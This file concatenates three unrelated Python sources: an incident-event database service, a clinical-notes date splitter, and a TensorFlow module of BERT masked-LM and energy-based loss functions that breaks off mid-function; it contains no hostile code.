from uuid import uuid4
import datetime
import logging
from dispatch.incident import service as incident_service
from dispatch.individual import service as individual_service
from .models import Event, EventCreate, EventUpdate
logger = logging.getLogger(__name__)
def get(*, db_session, event_id: int) -> Optional[Event]:
"""Get an event by id."""
return db_session.query(Event).filter(Event.id == event_id).one_or_none()
def get_by_incident_id(*, db_session, incident_id: int) -> List[Optional[Event]]:
"""Get events by incident id."""
return db_session.query(Event).filter(Event.incident_id == incident_id)
def get_all(*, db_session) -> List[Optional[Event]]:
"""Get all events."""
return db_session.query(Event)
def create(*, db_session, event_in: EventCreate) -> Event:
"""Create a new event."""
event = Event(**event_in.dict())
db_session.add(event)
db_session.commit()
return event
def update(*, db_session, event: Event, event_in: EventUpdate) -> Event:
"""Updates an event."""
event_data = event.dict()
update_data = event_in.dict(skip_defaults=True)
for field in event_data:
if field in update_data:
setattr(event, field, update_data[field])
db_session.commit()
return event
def delete(*, db_session, event_id: int):
"""Deletes an event."""
event = db_session.query(Event).filter(Event.id == event_id).first()
db_session.delete(event)
db_session.commit()
def log(
db_session,
source: str,
description: str,
incident_id: int,
individual_id: int = None,
started_at: datetime = None,
ended_at: datetime = None,
details: dict = None,
) -> Event:
"""Logs an event."""
uuid = uuid4()
if not started_at:
started_at = datetime.datetime.utcnow()
if not ended_at:
ended_at = started_at
event_in = EventCreate(
uuid=uuid,
started_at=started_at,
ended_at=ended_at,
source=source,
description=description,
details=details,
)
event = create(db_session=db_session, event_in=event_in)
incident = incident_service.get(db_session=db_session, incident_id=incident_id)
incident.events.append(event)
db_session.add(incident)
if individual_id:
individual = individual_service.get(
db_session=db_session, individual_contact_id=individual_id
)
individual.events.append(event)
db_session.add(individual)
db_session.commit()
logger.info(f"{source}: {description}")
return event
|
471161
|
import regex
import logging
def normalize_date(date, id_, start, end):
""" Normalizes different dates encountered in the clinical notes.
Current accepted formats:
28 Feb 2913 04:50
Thu 28 Feb 2013 04:50
28-Feb-2013 04:50
Output:
28 Feb 2013 04:50
"""
if '-' in date:
date = date.replace("-", " ").strip()
elif date.strip()[0].isalpha():
date = date[date.index(' '):].strip()
elif date.strip()[0].isnumeric():
# all good
date = date.strip()
else:
logging.warning("Unsupported date format: %s for id: %s with start: %s, end: %s", date, id_, start, end)
return None
return date
def split_one_note(id_, text):
""" Splits the text of one note by date.
Return:
split_note (List[Dict]):
Returns a list of dictionary in the format: {'start': <start char of the specific note in the big one>,
'end': <end char of the specifc note in the big one>,
'text': <text of the specific note>,
'date': <date of the specific note>}
"""
r = r'\n\w{0,5}\s*\d{1,2}(\s|-)[a-zA-Z]{3,5}(\s|-)\d{4}\s+\d{2}\:\d{2}'
dates = regex.finditer(r, text)
start = 0
end = -1
split_note = []
previous_date = None
for date in dates:
if start == 0:
start = date.span()[0]
previous_date = date.captures()[0]
elif previous_date is None or date.captures()[0] != previous_date:
end = date.span()[0]
note_text = text[start:end]
if 'entered on -' in note_text.lower():
if len(regex.findall(r'entered on -', note_text)) > 1:
logging.warning("Possible problems for span with start: %s and end: %s for note with id: %s", start, end, id_)
split_note.append({'start': start, 'end': end, 'text': note_text, 'date': normalize_date(previous_date, id_, start, end)})
start = end
previous_date = date.captures()[0]
# Add the last note
if previous_date is not None and 'entered on -' in text[start:].lower():
split_note.append({'start': start, 'end': len(text), 'text': text[start:], 'date': normalize_date(previous_date, id_, start, len(text))})
else:
logging.warning("No date/entered-on detected for id: %s wth start: %s, end: %s and text:\n%s...", id_, start, end, text[0:300])
return split_note
def split_clinical_notes(clinical_notes):
""" Splits clinical notes.
Args:
clinical_notes(dict):
Dictionary in the form {<clinical_note_id>: <text>, ...}
"""
split_notes = {}
for id_text, text in clinical_notes.items():
split_notes[id_text] = split_one_note(id_text, text)
return split_notes
|
471172
|
from utils.bert import bert_utils
from utils.bert import bert_modules
import numpy as np
import collections
import copy
import json
import math
import re
import six
import tensorflow as tf
from loss import loss_utils
from loss.entfox import sparse_entmax15_loss_with_logits, entmax15_loss_with_logits
def check_tf_version():
version = tf.__version__
print("==tf version==", version)
if int(version.split(".")[0]) >= 2 or int(version.split(".")[1]) >= 15:
return True
else:
return False
def normalizing(x, axis):
norm = tf.sqrt(tf.reduce_sum(tf.square(x), axis=axis, keep_dims=True))
normalized = x / (norm+1e-10)
return normalized
def get_masked_lm_output_v1(config, input_tensor,
output_weights,
output_target,
output_target_mask,
output_target_mapping,
**kargs):
input_shape_list = bert_utils.get_shape_list(input_tensor, expected_rank=3)
batch_size = input_shape_list[0]
seq_length = input_shape_list[1]
hidden_dims = input_shape_list[2]
embedding_projection = kargs.get('embedding_projection', None)
scope = kargs.get('scope', None)
if scope:
scope = scope + '/' + 'cls/predictions'
else:
scope = 'cls/predictions'
tf.logging.info("**** mlm generator scope **** %s", str(scope))
if output_target_mapping is not None:
# [batch_size, num_predict, hidden_dims]
if check_tf_version():
input_tensor = tf.einsum("...id,...ki->...kd", input_tensor, output_target_mapping)
else:
input_tensor = tf.einsum("aid,aki->akd", input_tensor, output_target_mapping)
tf.logging.info("==using target output_target_mapping input==")
else:
tf.logging.info("==using whole sentence input==")
# with tf.variable_scope("cls/predictions", reuse=tf.AUTO_REUSE):
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
if config.get('ln_type', 'postln') == 'preln':
input_tensor = bert_modules.layer_norm(input_tensor)
elif config.get('ln_type', 'postln') == 'postln':
input_tensor = input_tensor
else:
input_tensor = input_tensor
if config.get("embedding", "none_factorized") == "none_factorized":
projection_width = config.hidden_size
tf.logging.info("==not using embedding factorized==")
else:
projection_width = config.get('embedding_size', config.hidden_size)
tf.logging.info("==using embedding factorized: embedding size: %s==", str(projection_width))
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=projection_width,
activation=bert_modules.get_activation(config.hidden_act),
kernel_initializer=bert_modules.create_initializer(
config.initializer_range))
if config.get('ln_type', 'postln') == 'preln':
input_tensor = input_tensor
elif config.get('ln_type', 'postln') == 'postln':
input_tensor = bert_modules.layer_norm(input_tensor)
else:
input_tensor = bert_modules.layer_norm(input_tensor)
if embedding_projection is not None:
# batch x seq x hidden, embedding x hidden
print(input_tensor.get_shape(), embedding_projection.get_shape())
input_tensor = tf.einsum("abc,dc->abd", input_tensor, embedding_projection)
else:
print("==no need for embedding projection==")
input_tensor = input_tensor
output_bias = tf.get_variable(
"output_bias",
shape=[config.vocab_size],
initializer=tf.zeros_initializer())
# [batch, num_predict, embedding]
logits = tf.einsum("abc,dc->abd", input_tensor, output_weights)
logits = tf.nn.bias_add(logits, output_bias)
if kargs.get("pretrain_loss_type", "normal") == "normal":
# [batch, num_predict]
per_example_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits,
labels=tf.stop_gradient(output_target),
)
per_example_loss *= output_target_mask
loss = tf.reduce_sum(per_example_loss) / (1e-10 + tf.reduce_sum(output_target_mask))
tf.logging.info("**** normal mlm loss ****")
elif kargs.get("pretrain_loss_type", "normal") == "gradient_penalty":
log_probs = tf.nn.log_softmax(logits, axis=-1)
# [batch_size*num_predict]
label_ids = tf.reshape(output_target, [-1])
# [batch_size*num_predict]
label_weights = tf.reshape(output_target_mask, [-1])
# [batch_size*num_predict, vocab_size]
log_probs = tf.reshape(log_probs, [-1, config.vocab_size])
# [batch_size*num_predict, vocab_size]
one_hot_labels = tf.one_hot(
label_ids, depth=config.vocab_size, dtype=tf.float32)
# The `positions` tensor might be zero-padded (if the sequence is too
# short to have the maximum number of predictions). The `label_weights`
# tensor has a value of 1.0 for every real prediction and 0.0 for the
# padding predictions.
per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
# output_weights is embedding_matrix
gp = tf.reduce_sum(tf.gradients(loss, [output_weights])[0]**2)
loss += 0.5 * kargs.get('epsilon', 1.0) * gp
tf.logging.info("**** normal mlm loss with gradient penalty ****")
else:
per_example_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits,
labels=tf.stop_gradient(input_ori_ids),
)
per_example_loss *= output_target_mask
loss = tf.reduce_sum(per_example_loss) / (1e-10 + tf.reduce_sum(output_target_mask))
tf.logging.info("**** normal mlm loss ****")
return (loss, per_example_loss, logits, output_target_mask)
def get_masked_lm_output(config, input_tensor, output_weights, positions,
label_ids, label_weights, **kargs):
"""Get loss and log probs for the masked LM."""
reuse = kargs.get('reuse', False)
input_tensor = tf.cast(input_tensor, tf.float32)
positions = tf.cast(positions, tf.int32)
label_ids = tf.cast(label_ids, tf.int32)
label_weights = tf.cast(label_weights, tf.float32)
scope = kargs.get('scope', None)
if scope:
scope = scope + '/' + 'cls/predictions'
else:
scope = 'cls/predictions'
tf.logging.info("**** mlm scope **** %s", str(scope))
# if config.get("embedding", "factorized") == "factorized":
# projection_width = config.hidden_size
# else:
# projection_width = config.embedding_size
if config.get("embedding", "none_factorized") == "none_factorized":
projection_width = config.hidden_size
tf.logging.info("==not using embedding factorized==")
else:
projection_width = config.get('embedding_size', config.hidden_size)
tf.logging.info("==using embedding factorized: embedding size: %s==", str(projection_width))
input_tensor = bert_utils.gather_indexes(input_tensor, positions)
"""
flatten masked lm ids with positions
"""
# with tf.variable_scope("cls/predictions", reuse=reuse):
with tf.variable_scope(scope, reuse=reuse):
# We apply one more non-linear transformation before the output layer.
# This matrix is not used after pre-training.
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=projection_width,
activation=bert_modules.get_activation(config.hidden_act),
kernel_initializer=bert_modules.create_initializer(
config.initializer_range))
input_tensor = bert_modules.layer_norm(input_tensor)
# The output weights are the same as the input embeddings, but there is
# an output-only bias for each token.
output_bias = tf.get_variable(
"output_bias",
shape=[config.vocab_size],
initializer=tf.zeros_initializer())
logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits, axis=-1)
label_ids = tf.reshape(label_ids, [-1])
label_weights = tf.reshape(label_weights, [-1])
if kargs.get("pretrain_loss_type", "normal") == "entmax":
one_hot_labels = tf.one_hot(
label_ids, depth=config.vocab_size, dtype=tf.float32)
per_example_loss = entmax15_loss_with_logits(one_hot_labels, logits)
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
tf.logging.info("**** entmax for mlm loss ****")
elif kargs.get("pretrain_loss_type", "normal") == "normal":
one_hot_labels = tf.one_hot(
label_ids, depth=config.vocab_size, dtype=tf.float32)
# per_example_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
# labels=tf.stop_gradient(label_ids),
# logits=logits)
per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
# The `positions` tensor might be zero-padded (if the sequence is too
# short to have the maximum number of predictions). The `label_weights`
# tensor has a value of 1.0 for every real prediction and 0.0 for the
# padding predictions.
# per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
# numerator = tf.reduce_sum(label_weights * per_example_loss)
# denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
tf.logging.info("**** normal loss for mlm loss ****")
if kargs.get("pretrain_loss_type", "normal") == "gradient_penalty":
# output_weights is embedding_matrix
gp = tf.reduce_sum(tf.gradients(loss, [output_weights])[0]**2)
loss += 0.5 * kargs.get('epsilon', 1.0) * gp
tf.logging.info("**** normal mlm loss with gradient penalty ****")
return (loss, per_example_loss, log_probs, label_weights)
def get_next_sentence_output(config, input_tensor, labels, reuse=None, **kargs):
"""Get loss and log probs for the next sentence prediction."""
# Simple binary classification. Note that 0 is "next sentence" and 1 is
# "random sentence". This weight matrix is not used after pre-training.
scope = kargs.get('scope', None)
if scope:
scope = scope + '/' + 'cls/seq_relationship'
else:
scope = 'cls/seq_relationship'
tf.logging.info("**** nsp scope **** %s", str(scope))
# with tf.variable_scope("cls/seq_relationship", reuse=reuse):
with tf.variable_scope(scope, reuse=reuse):
output_weights = tf.get_variable(
"output_weights",
shape=[2, config.hidden_size],
initializer=bert_modules.create_initializer(config.initializer_range))
output_bias = tf.get_variable(
"output_bias", shape=[2], initializer=tf.zeros_initializer())
logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits, axis=-1)
labels = tf.reshape(labels, [-1])
one_hot_labels = tf.one_hot(labels, depth=2, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1)
loss = tf.reduce_mean(per_example_loss)
return (loss, per_example_loss, log_probs)
def seq_mask_masked_lm_output(config, input_tensor, output_weights,
input_mask, input_ori_ids, input_ids,
sampled_binary_mask, **kargs):
input_shape_list = bert_utils.get_shape_list(input_tensor, expected_rank=3)
batch_size = input_shape_list[0]
seq_length = input_shape_list[1]
hidden_dims = input_shape_list[2]
embedding_projection = kargs.get('embedding_projection', None)
scope = kargs.get('scope', None)
if scope:
scope = scope + '/' + 'cls/predictions'
else:
scope = 'cls/predictions'
tf.logging.info("**** mlm generator scope **** %s", str(scope))
# with tf.variable_scope("cls/predictions", reuse=tf.AUTO_REUSE):
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
if config.get('ln_type', 'postln') == 'preln':
input_tensor = bert_modules.layer_norm(input_tensor)
elif config.get('ln_type', 'postln') == 'postln':
input_tensor = input_tensor
else:
input_tensor = input_tensor
# if config.get("embedding", "factorized") == "factorized":
# projection_width = config.hidden_size
# else:
# projection_width = config.embedding_size
if config.get("embedding", "none_factorized") == "none_factorized":
projection_width = config.hidden_size
tf.logging.info("==not using embedding factorized==")
else:
projection_width = config.get('embedding_size', config.hidden_size)
tf.logging.info("==using embedding factorized: embedding size: %s==", str(projection_width))
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=projection_width,
activation=bert_modules.get_activation(config.hidden_act),
kernel_initializer=bert_modules.create_initializer(
config.initializer_range))
if config.get('ln_type', 'postln') == 'preln':
input_tensor = input_tensor
elif config.get('ln_type', 'postln') == 'postln':
input_tensor = bert_modules.layer_norm(input_tensor)
else:
input_tensor = bert_modules.layer_norm(input_tensor)
if embedding_projection is not None:
# batch x seq x hidden, embedding x hidden
print(input_tensor.get_shape(), embedding_projection.get_shape())
input_tensor = tf.einsum("abc,dc->abd", input_tensor, embedding_projection)
else:
print("==no need for embedding projection==")
input_tensor = input_tensor
output_bias = tf.get_variable(
"output_bias",
shape=[config.vocab_size],
initializer=tf.zeros_initializer())
# batch x seq x embedding
logits = tf.einsum("abc,dc->abd", input_tensor, output_weights)
logits = tf.nn.bias_add(logits, output_bias)
"""
if input_ori_ids[i] is random pertubated, sampled_binary_mask[i]=1
"""
sampled_binary_mask = tf.cast(sampled_binary_mask, tf.float32)
input_mask = tf.cast(input_mask, tf.float32)
sampled_binary_mask *= input_mask
if kargs.get("pretrain_loss_type", "normal") == "normal":
per_example_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits,
labels=tf.stop_gradient(input_ori_ids),
)
per_example_loss *= sampled_binary_mask
loss = tf.reduce_sum(per_example_loss) / (1e-10 + tf.reduce_sum(sampled_binary_mask))
tf.logging.info("**** normal mlm loss ****")
elif kargs.get("pretrain_loss_type", "normal") == "gradient_penalty":
log_probs = tf.nn.log_softmax(logits, axis=-1)
# [batch_size*seq_len]
label_ids = tf.reshape(input_ori_ids, [-1])
# [batch_size*seq_len]
label_weights = tf.reshape(sampled_binary_mask, [-1])
# [batch_size*seq_len, vocab_size]
log_probs = tf.reshape(log_probs, [-1, config.vocab_size])
# [batch_size*seq_len, vocab_size]
one_hot_labels = tf.one_hot(
label_ids, depth=config.vocab_size, dtype=tf.float32)
# The `positions` tensor might be zero-padded (if the sequence is too
# short to have the maximum number of predictions). The `label_weights`
# tensor has a value of 1.0 for every real prediction and 0.0 for the
# padding predictions.
per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
# output_weights is embedding_matrix
gp = tf.reduce_sum(tf.gradients(loss, [output_weights])[0]**2)
loss += 0.5 * kargs.get('epsilon', 1.0) * gp
tf.logging.info("**** normal mlm loss with gradient penalty ****")
else:
per_example_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits,
labels=tf.stop_gradient(input_ori_ids),
)
per_example_loss *= sampled_binary_mask
tf.logging.info("**** normal mlm loss ****")
return (loss, per_example_loss, logits, sampled_binary_mask)
def denoise_autoencoder(config, input_tensor, output_weights,
input_mask, input_ori_ids, input_ids,
sampled_binary_mask, **kargs):
input_shape_list = bert_utils.get_shape_list(input_tensor, expected_rank=3)
batch_size = input_shape_list[0]
seq_length = input_shape_list[1]
hidden_dims = input_shape_list[2]
embedding_projection = kargs.get('embedding_projection', None)
scope = kargs.get('scope', None)
if scope:
scope = scope + '/' + 'cls/predictions'
else:
scope = 'cls/predictions'
tf.logging.info("**** mlm generator scope **** %s", str(scope))
# with tf.variable_scope("cls/predictions", reuse=tf.AUTO_REUSE):
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
if config.get('ln_type', 'postln') == 'preln':
input_tensor = bert_modules.layer_norm(input_tensor)
elif config.get('ln_type', 'postln') == 'postln':
input_tensor = input_tensor
else:
input_tensor = input_tensor
if config.get("embedding", "none_factorized") == "none_factorized":
projection_width = config.hidden_size
tf.logging.info("==not using embedding factorized==")
else:
projection_width = config.get('embedding_size', config.hidden_size)
tf.logging.info("==using embedding factorized: embedding size: %s==", str(projection_width))
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=projection_width,
activation=bert_modules.get_activation(config.hidden_act),
kernel_initializer=bert_modules.create_initializer(
config.initializer_range))
# if config.get('ln_type', 'postln') == 'preln':
# input_tensor = input_tensor
# elif config.get('ln_type', 'postln') == 'postln':
# input_tensor = bert_modules.layer_norm(input_tensor)
# else:
# input_tensor = bert_modules.layer_norm(input_tensor)
if embedding_projection is not None:
# batch x seq x hidden, embedding x hidden
print(input_tensor.get_shape(), embedding_projection.get_shape())
input_tensor = tf.einsum("abc,dc->abd", input_tensor, embedding_projection)
else:
print("==no need for embedding projection==")
input_tensor = input_tensor
if kargs.get("discriminator_mode", None) == "gan":
pass
elif kargs.get("discriminator_mode", "ce_loss") == "ce_loss":
input_tensor_norm = normalizing(input_tensor, 2) # batch L emb
output_weights_norm = normalizing(output_weights, 1) # batch emb
logits = tf.einsum("abd,cd->abc", input_tensor_norm, output_weights_norm)
temperature = config.get("temperature", 100.0)
log_probs = tf.nn.log_softmax(logits*temperature,
dim=-1, name=None)
tf.logging.info("== ce loss with temperature: %s =="%(str(temperature)))
rec_sent = tf.squeeze(tf.argmax(logits, 2))
# [batch_size*seq_len]
label_ids = tf.reshape(input_ori_ids, [-1])
# [batch_size*seq_len]
# [batch_size*seq_len, vocab_size]
log_probs = tf.reshape(log_probs, [-1, config.vocab_size])
# [batch_size*seq_len, vocab_size]
one_hot_labels = tf.one_hot(
label_ids, depth=config.vocab_size, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
if kargs.get("loss_converage", "local") == "local":
label_weights = tf.reshape(sampled_binary_mask, [-1])
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
elif kargs.get("loss_converage", "local") == "global":
all_label_weights = tf.reshape(tf.cast(input_mask, dtype=tf.float32), [-1])
numerator = tf.reduce_sum(all_label_weights * per_example_loss)
denominator = tf.reduce_sum(all_label_weights) + 1e-5
loss = numerator / denominator
elif kargs.get("discriminator_mode", "ce_loss") == "normal_ce_loss":
if config.get('ln_type', 'postln') == 'preln':
input_tensor = input_tensor
elif config.get('ln_type', 'postln') == 'postln':
input_tensor = bert_modules.layer_norm(input_tensor)
else:
input_tensor = bert_modules.layer_norm(input_tensor)
tf.logging.info("== normal ce loss ==")
output_bias = tf.get_variable(
"output_bias",
shape=[config.vocab_size],
initializer=tf.zeros_initializer())
logits = tf.einsum("abd,cd->abc", input_tensor, output_weights)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits, axis=-1)
# [batch_size*seq_len]
label_ids = tf.reshape(input_ori_ids, [-1])
# [batch_size*seq_len, vocab_size]
log_probs = tf.reshape(log_probs, [-1, config.vocab_size])
# [batch_size*seq_len, vocab_size]
one_hot_labels = tf.one_hot(
label_ids, depth=config.vocab_size, dtype=tf.float32)
# The `positions` tensor might be zero-padded (if the sequence is too
# short to have the maximum number of predictions). The `label_weights`
# tensor has a value of 1.0 for every real prediction and 0.0 for the
# padding predictions.
per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
if kargs.get("loss_converage", "local") == "local":
label_weights = tf.reshape(sampled_binary_mask, [-1])
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
elif kargs.get("loss_converage", "local") == "global":
all_label_weights = tf.reshape(tf.cast(input_mask, dtype=tf.float32), [-1])
numerator = tf.reduce_sum(all_label_weights * per_example_loss)
denominator = tf.reduce_sum(all_label_weights) + 1e-5
loss = numerator / denominator
elif kargs.get("discriminator_mode", "ce_loss") == "circle_loss":
input_tensor_norm = normalizing(input_tensor, 2) # batch L emb
output_weights_norm = normalizing(output_weights, 1) # batch emb
logits = tf.einsum("abd,cd->abc", input_tensor_norm, output_weights_norm)
gamma = kargs.get("circle_loss_gamma", 64)
margin = kargs.get("circle_loss_margin", 0.25)
tf.logging.info("== apply sparse circle loss, gamma: %s, marin: %s=="%(str(gamma), str(margin)))
# [batch_size x seq_length]
label_ids = tf.reshape(input_ori_ids, [-1])
# [batch_size x seq_length, vocab_size]
logits_all = tf.reshape(logits, [-1, config.vocab_size])
# [batch_size x seq_length,zaa 1]
per_example_loss, logits_mask = loss_utils.sparse_circle_loss_v1(
label_ids,
logits_all,
n_class=config.vocab_size,
margin=margin,
gamma=gamma)
if kargs.get("loss_converage", "local") == "local":
label_weights = tf.reshape(sampled_binary_mask, [-1])
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
elif kargs.get("loss_converage", "local") == "global":
all_label_weights = tf.reshape(tf.cast(input_mask, dtype=tf.float32), [-1])
numerator = tf.reduce_sum(all_label_weights * per_example_loss)
denominator = tf.reduce_sum(all_label_weights) + 1e-5
loss = numerator / denominator
return (loss, per_example_loss, logits, sampled_binary_mask)
def emb_score(config, input_tensor, input_ids,
output_weights,
input_mask, **kargs):
input_shape_list = bert_utils.get_shape_list(input_tensor, expected_rank=3)
batch_size = input_shape_list[0]
seq_length = input_shape_list[1]
hidden_dims = input_shape_list[2]
scope = kargs.get('scope', None)
if scope:
lm_scope = scope + '/' + 'cls/predictions'
else:
lm_scope = 'cls/predictions'
tf.logging.info("**** mlm generator scope **** %s", str(lm_scope))
# with tf.variable_scope("cls/predictions", reuse=tf.AUTO_REUSE):
with tf.variable_scope(lm_scope, reuse=tf.AUTO_REUSE):
if config.get('ln_type', 'postln') == 'preln':
input_tensor = bert_modules.layer_norm(input_tensor)
elif config.get('ln_type', 'postln') == 'postln':
input_tensor = input_tensor
else:
input_tensor = input_tensor
if config.get("embedding", "none_factorized") == "none_factorized":
projection_width = config.hidden_size
tf.logging.info("==not using embedding factorized==")
else:
projection_width = config.get('embedding_size', config.hidden_size)
tf.logging.info("==using embedding factorized: embedding size: %s==", str(projection_width))
if kargs.get("energy_pooling", "mi") == "mi":
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=projection_width,
activation=bert_modules.get_activation(config.hidden_act),
kernel_initializer=bert_modules.create_initializer(
config.initializer_range))
if config.get('ln_type', 'postln') == 'preln':
input_tensor = input_tensor
elif config.get('ln_type', 'postln') == 'postln':
input_tensor = bert_modules.layer_norm(input_tensor)
else:
input_tensor = bert_modules.layer_norm(input_tensor)
output_bias = tf.get_variable(
"output_bias",
shape=[config.vocab_size],
initializer=tf.zeros_initializer())
tf.logging.info("****** mi using mlm transform *******")
elif kargs.get("energy_pooling", "mi") == "cls":
with tf.variable_scope("transform_ebm"):
# We "pool" the model by simply taking the hidden state corresponding
# to the first token. We assume that this has been pre-trained
first_token_tensor = tf.squeeze(input_tensor[:, 0:1, :], axis=1)
input_tensor = tf.layers.dense(
first_token_tensor,
config.hidden_size,
activation=tf.tanh, #bert_modules.get_activation(config.hidden_act),
kernel_initializer=bert_modules.create_initializer(config.initializer_range))
tf.logging.info("****** using cls pooling *******")
else:
with tf.variable_scope("transform_ebm"):
input_tensor = tf.layers.dense(
input_tensor,
units=projection_width,
activation=tf.tanh, #bert_modules.get_activation(config.hidden_act),
kernel_initializer=bert_modules.create_initializer(
config.initializer_range))
tf.logging.info("****** using other pooling transform *******")
# with tf.variable_scope("cls/predictions", reuse=tf.AUTO_REUSE):
if scope:
ebm_scope = scope + '/' + 'ebm/predictions'
else:
ebm_scope = 'ebm/predictions'
tf.logging.info("**** ebm generator scope **** %s", str(ebm_scope))
print(input_tensor.get_shape(), "==input_tensor shape==")
with tf.variable_scope(ebm_scope, reuse=tf.AUTO_REUSE):
# assume the whole model is self-normalization
if kargs.get("normalized_constant", "constant") == 'zero_constant':
normalized_constant = tf.get_variable(
"ebm_normalized_constant",
shape=[config.max_position_embeddings],
initializer=tf.zeros_initializer())
valid_seq_length = tf.cast(tf.reduce_sum(input_mask, axis=-1), tf.int32) # batch_size
onehot_length_ids = tf.one_hot(valid_seq_length, config.max_position_embeddings)
input_normalized_constant = tf.einsum("ab,b->a", tf.cast(onehot_length_ids, tf.float32), normalized_constant)
tf.logging.info("****** zero_constant logz *******")
elif kargs.get("normalized_constant", "constant") == 'one_constant':
normalized_constant = tf.get_variable(
"ebm_normalized_constant",
shape=[config.max_position_embeddings],
initializer=tf.ones_initializer())
tf.logging.info("****** one_constant logz *******")
valid_seq_length = tf.cast(tf.reduce_sum(input_mask, axis=-1), tf.int32) # batch_size
onehot_length_ids = tf.one_hot(valid_seq_length, config.max_position_embeddings)
input_normalized_constant = tf.einsum("ab,b->a", tf.cast(onehot_length_ids, tf.float32), normalized_constant)
elif kargs.get("normalized_constant", "constant") == 'constant_constant':
normalized_constant = tf.get_variable(
"ebm_normalized_constant",
shape=[config.max_position_embeddings],
initializer=tf.constant_initializer(np.ones((config.max_position_embeddings))*200.0, tf.float32))
tf.logging.info("****** one_constant logz *******")
valid_seq_length = tf.cast(tf.reduce_sum(input_mask, axis=-1), tf.int32) # batch_size
onehot_length_ids = tf.one_hot(valid_seq_length, config.max_position_embeddings)
input_normalized_constant = tf.einsum("ab,b->a", tf.cast(onehot_length_ids, tf.float32), normalized_constant)
elif kargs.get("normalized_constant", "constant") == 'log9_constant':
normalized_constant = tf.get_variable(
"ebm_normalized_constant",
shape=[config.max_position_embeddings],
initializer=tf.constant_initializer(np.ones((config.max_position_embeddings))*np.log(9.0), tf.float32))
tf.logging.info("****** one_constant logz *******")
valid_seq_length = tf.cast(tf.reduce_sum(input_mask, axis=-1), tf.int32) # batch_size
onehot_length_ids = tf.one_hot(valid_seq_length, config.max_position_embeddings)
input_normalized_constant = tf.einsum("ab,b->a", tf.cast(onehot_length_ids, tf.float32), normalized_constant)
elif kargs.get("normalized_constant", "constant") == 'logv_constant':
normalized_constant = tf.get_variable(
"ebm_normalized_constant",
shape=[config.max_position_embeddings],
initializer=tf.constant_initializer(np.ones((config.max_position_embeddings))*np.log(config.vocab_size), tf.float32))
tf.logging.info("****** one_constant logz *******")
valid_seq_length = tf.cast(tf.reduce_sum(input_mask, axis=-1), tf.int32) # batch_size
onehot_length_ids = tf.one_hot(valid_seq_length, config.max_position_embeddings)
input_normalized_constant = tf.einsum("ab,b->a", tf.cast(onehot_length_ids, tf.float32), normalized_constant)
elif kargs.get("normalized_constant", "constant") == 'logv_constant_ln':
normalized_constant = tf.get_variable(
"ebm_normalized_constant",
shape=[],
initializer=tf.constant_initializer(np.log(config.vocab_size), tf.float32))
input_normalized_constant = normalized_constant
elif kargs.get("normalized_constant", "length_linear") == 'length_linear':
normalized_constant = tf.get_variable(
"ebm_normalized_constant",
shape=[config.max_position_embeddings],
initializer=tf.constant_initializer(np.arange((config.max_position_embeddings))+1, tf.float32),
trainable=False)
scale_weights = tf.get_variable(
"ebm_normalized_constant_scale",
shape=[config.max_position_embeddings],
initializer=tf.constant_initializer(np.log(config.vocab_size)*np.ones((config.max_position_embeddings)), dtype=tf.float32),
trainable=True)
scale_bias = tf.get_variable(
"ebm_normalized_constant_bias",
shape=[config.max_position_embeddings],
initializer=tf.zeros_initializer(),
trainable=True)
tf.logging.info("****** length linear logz *******")
# normalized_constant = scale_bias + scale_weights * tf.pow(normalized_constant, 2)
valid_seq_length = tf.cast(tf.reduce_sum(input_mask, axis=-1), tf.int32) # batch_size
onehot_length_ids = tf.one_hot(valid_seq_length, config.max_position_embeddings)
length_part = tf.einsum("ab,b->a", tf.cast(onehot_length_ids, tf.float32), normalized_constant)
length_scale_part = tf.einsum("ab,b->a", tf.cast(onehot_length_ids, tf.float32), scale_weights)
length_bias_part = tf.einsum("ab,b->a", tf.cast(onehot_length_ids, tf.float32), scale_bias)
input_normalized_constant = length_part*length_scale_part + length_bias_part
# input_normalized_constant = tf.einsum("ab,b->a", tf.cast(onehot_length_ids, tf.float32), normalized_constant)
